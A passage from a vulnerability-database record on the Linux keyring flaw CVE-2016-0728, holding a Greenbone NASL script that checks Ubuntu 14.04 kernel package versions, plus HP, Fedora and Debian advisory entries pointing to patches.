you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842610\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:47 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2873-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. 
A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2873-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2873-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic-lpae\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-lowlatency\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-e500mc\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-emb\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "hp": [{"lastseen": "2020-10-13T01:01:48", "bulletinFamily": "software", "cvelist": ["CVE-2016-0758", "CVE-2016-0728"], "description": "## Potential Security Impact\nElevated Privileges\n\n**Source:** Hewlett-Packard Company, HP Software Security Response Team \n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified with certain HP Thin Clients running ThinPro OS. The vulnerability could be exploited locally, resulting in elevated privileges.\n\n## RESOLUTION\nHP has released the following software updates to resolve the vulnerability. 
Patches for the affected version of HP ThinPro can be found through the links below:\n\n * [HP ThinPro 5.2.1](<http://ftp.hp.com/pub/tcdebian/updates/5.2.1/service_packs/CVE-2016-0728-3.0-all-5.2.1-x86-SQ.xar>)\n\n * [HP ThinPro 5.2](<http://ftp.hp.com/pub/tcdebian/updates/5.2/service_packs/CVE-2016-0758-1.0-all-5.2-x86-SQ.xar>)\n\n * [HP ThinPro 5.1](<http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/CVE-2016-0728-3.0-all-5.0-5.1-x86-SQ.xar>)\n\n * [HP ThinPro 5.0](<http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/CVE-2016-0728-3.0-all-5.0-5.1-x86-SQ.xar>)\n\n * [HP ThinPro 4.4](<http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/CVE-2016-0758-1.0-all-4.4-x86-SQ.xar>)\n", "edition": 2, "modified": "2017-07-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "HP:C05018265", "href": "https://support.hp.com/us-en/document/c05018265", "title": "HPSBHF03436 rev.2 - HP Thin Client with ThinPro OS, running Linux, Local Elevated Privileges", "type": "hp", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7513", "CVE-2015-7566", "CVE-2016-0728"], "description": "The kernel meta package ", "modified": "2016-01-26T18:29:15", "published": "2016-01-26T18:29:15", "id": "FEDORA:A5C89601FC0F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.3.3-303.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:09:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0723", "CVE-2016-0728", "CVE-2015-8767", "CVE-2013-4312", "CVE-2015-7566"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3448-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 19, 2016 https://www.debian.org/security/faq\n- 
-------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2013-4312 CVE-2015-7566 CVE-2015-8767 CVE-2016-0723\n CVE-2016-0728\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation or denial-of-service.\n\nCVE-2013-4312\n\n Tetsuo Handa discovered that it is possible for a process to open\n far more files than the process' limit leading to denial-of-service\n conditions.\n\nCVE-2015-7566\n\n Ralf Spenneberg of OpenSource Security reported that the visor\n driver crashes when a specially crafted USB device without bulk-out\n endpoint is detected.\n\nCVE-2015-8767\n\n An SCTP denial-of-service was discovered which can be triggered by a\n local attacker during a heartbeat timeout event after the 4-way\n handshake.\n\nCVE-2016-0723\n\n A use-after-free vulnerability was discovered in the TIOCGETD ioctl.\n A local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0728\n\n The Perception Point research team discovered a use-after-free\n vulnerability in the keyring facility, possibly leading to local\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.7-ckt20-1+deb8u3.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 18, "modified": "2016-01-19T12:40:28", "published": "2016-01-19T12:40:28", "id": "DEBIAN:DSA-3448-1:C7742", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00018.html", "title": "[SECURITY] [DSA 3448-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}